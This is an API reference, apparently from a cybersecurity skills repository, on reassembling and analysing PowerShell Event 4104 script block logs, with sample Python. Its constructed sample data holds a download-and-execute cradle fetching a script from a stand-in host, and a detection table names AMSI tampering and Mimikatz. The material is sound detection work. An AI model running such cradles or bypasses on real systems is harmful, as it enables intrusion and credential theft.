mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

API Reference: PowerShell Script Block Logging Analysis

python-evtx Library

Evtx (file iteration)

from Evtx.Evtx import Evtx

# Evtx opens and memory-maps the file, parses the file header and, through
# records(), walks every chunk and yields one Record per event. FileHeader is
# the lower-level class underneath it: it takes a buffer (an mmap) plus a byte
# offset, not an open file object, so call it only when you need chunk-level access.
with Evtx(evtx_path) as log:
    for record in log.records():
        xml_string = record.xml()  # XML text of one event, without an XML declaration

Event XML Structure (Event ID 4104)

Event 4104 ("Execute a Remote Command") is written by the Microsoft-Windows-PowerShell provider to the Microsoft-Windows-PowerShell/Operational channel. Trimmed to the fields this analysis uses:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PowerShell"/>
    <EventID>4104</EventID>
    <Level>5</Level>
    <TimeCreated SystemTime="2024-01-15T10:30:00.000Z"/>
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
  </System>
  <EventData>
    <Data Name="MessageNumber">1</Data>
    <Data Name="MessageTotal">3</Data>
    <Data Name="ScriptBlockText">...powershell code...</Data>
    <Data Name="ScriptBlockId">guid-string</Data>
    <Data Name="Path">C:\script.ps1</Data>
  </EventData>
</Event>

Level is 5 (Verbose) for ordinary script block logging. PowerShell raises it to 3 (Warning) for blocks it classifies as suspicious and writes those even when script block logging has not been turned on, so Level 3 is a cheap first filter. Path is empty when the block did not come from a file (interactive input, -Command, -EncodedCommand, Invoke-Expression of a downloaded string), so an empty Path on a long block is itself worth a look.

lxml etree Parsing

from lxml import etree

NS = {"evt": "http://schemas.microsoft.com/win/2004/08/events/event"}


def parse_event(xml_data):
    """Return (event_id, {Data Name: text}) for one event.

    lxml refuses a str that carries an XML encoding declaration; pass bytes for
    a full document, or the declaration-free str that record.xml() yields.
    """
    root = etree.fromstring(xml_data)
    event_id = root.findtext(".//evt:System/evt:EventID", namespaces=NS)
    data = {}
    for elem in root.findall(".//evt:EventData/evt:Data", NS):
        data[elem.get("Name")] = elem.text or ""  # an empty <Data/> reads back as None
    return event_id, data

Script Block Reconstruction

Large PowerShell script blocks are split across several Event 4104 entries and must be stitched back together before any pattern matching, otherwise a keyword that straddles a fragment boundary is missed:

  • ScriptBlockId: GUID shared by every fragment of one block (and by no other block)
  • MessageNumber: fragment index, 1-based
  • MessageTotal: number of fragments in the block (the same value on every fragment)
  • Reconstruct: concatenate the ScriptBlockText values ordered by MessageNumber, with no separator; the fragments are contiguous slices of the original text
  • Completeness: if any MessageNumber from 1 to MessageTotal is absent (log rollover, partial export), mark the block incomplete rather than analysing a truncated script
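
The reconstruction procedure above, carried through as an added example (not code from the skill's scripts/agent.py). It parses 4104 XML with the standard-library ElementTree instead of lxml so it runs with no extra dependencies; the namespace map and XPath are the same. The events, GUIDs, and the `example.invalid` URL are constructed sample data: one block arrives out of order in three parts, a second block has lost its first part, and a non-4104 event is mixed in to show it being skipped.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict
from xml.sax.saxutils import escape

# Same namespace map the lxml snippet uses; ElementTree accepts it unchanged.
NS = {"evt": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_4104(block_id, number, total, text, path=""):
    """Build one 4104 event in the EventData layout shown above (constructed test data)."""
    return (
        '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
        "<System><EventID>4104</EventID>"
        f'<TimeCreated SystemTime="2024-01-15T10:30:0{number}.000Z"/></System>'
        "<EventData>"
        f'<Data Name="MessageNumber">{number}</Data>'
        f'<Data Name="MessageTotal">{total}</Data>'
        f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
        f'<Data Name="ScriptBlockId">{block_id}</Data>'
        f'<Data Name="Path">{escape(path)}</Data>'
        "</EventData></Event>"
    )


def parse_4104(xml_string):
    """Return the 4104 fields as a dict, or None for any other event ID."""
    root = ET.fromstring(xml_string)
    if root.findtext("evt:System/evt:EventID", namespaces=NS) != "4104":
        return None
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("evt:EventData/evt:Data", NS)}
    return {
        "block_id": data.get("ScriptBlockId", ""),
        "number": int(data.get("MessageNumber", "1")),
        "total": int(data.get("MessageTotal", "1")),
        "text": data.get("ScriptBlockText", ""),
        "path": data.get("Path", ""),
    }


def reassemble(records):
    """Group fragments by ScriptBlockId and rebuild each script block.

    Returns (complete, incomplete): complete maps block_id -> full text (parts
    joined with no separator, ordered by MessageNumber); incomplete maps
    block_id -> sorted list of MessageNumbers that never showed up.
    """
    parts = defaultdict(dict)
    totals = {}
    for rec in records:
        if rec is None:  # non-4104 events are skipped, not treated as errors
            continue
        parts[rec["block_id"]][rec["number"]] = rec["text"]
        totals[rec["block_id"]] = rec["total"]
    complete, incomplete = {}, {}
    for block_id, chunks in parts.items():
        expected = range(1, totals[block_id] + 1)
        missing = [n for n in expected if n not in chunks]
        if missing:
            incomplete[block_id] = missing
        else:
            complete[block_id] = "".join(chunks[n] for n in expected)
    return complete, incomplete


# Constructed sample set (GUIDs and URL are made up): block A in three parts,
# received out of order; block B with part 1 lost; one 4103 event as noise.
BLOCK_A = "11111111-2222-3333-4444-555555555555"
BLOCK_B = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"
BLOCK_A_TEXT = (
    "$c = New-Object Net.WebClient; "
    "$p = $c.DownloadString('http://example.invalid/s.ps1'); "
    "Invoke-Expression $p"
)
SAMPLE_EVENTS = [
    make_4104(BLOCK_A, 2, 3, "$p = $c.DownloadString('http://example.invalid/s.ps1'); "),
    make_4104(BLOCK_B, 2, 2, "Start-Process $env:TEMP\\x.exe"),
    make_4104(BLOCK_A, 3, 3, "Invoke-Expression $p"),
    '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
    "<System><EventID>4103</EventID></System><EventData/></Event>",
    make_4104(BLOCK_A, 1, 3, "$c = New-Object Net.WebClient; ",
              path="C:\\Users\\Public\\s.ps1"),
]

if __name__ == "__main__":
    done, partial = reassemble(parse_4104(e) for e in SAMPLE_EVENTS)
    for bid, text in done.items():
        print(f"{bid}: {text}")
    for bid, missing in partial.items():
        print(f"{bid}: INCOMPLETE, missing parts {missing}")
```

With real data, feed `reassemble()` the output of `parse_4104(record.xml())` over every record of the Operational log; keep the incomplete map, because a block whose first fragment is missing is exactly the kind of thing an attacker who cleared part of the log leaves behind.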

Key Detection Patterns

| Pattern | MITRE technique | Risk |
| --- | --- | --- |
| -EncodedCommand | T1059.001 | High |
| FromBase64String | T1140 | High |
| Invoke-Expression / iex | T1059.001 | High |
| DownloadString / Net.WebClient | T1105 | Critical |
| AmsiUtils / amsiInitFailed | T1562.001 | Critical |
| Invoke-Mimikatz | T1003 | Critical |
| High entropy (>5.5 bits/char) | T1027 | Medium |

Risk is per hit, not a verdict. -EncodedCommand and FromBase64String show up routinely in vendor agents and scheduled tasks, so a lone High is a pivot for correlation (4103 module logging, 4688 process creation with the parent command line), while AMSI tampering and Invoke-Mimikatz justify an alert on their own. The entropy row is meant for long base64-looking runs inside the block, not the whole script: Shannon entropy is bounded by log2(length), so a short token can never reach 5.5 bits per character, and base64 of UTF-16LE (the -EncodedCommand format) scores below random base64 because every second byte of the plaintext is 0x00.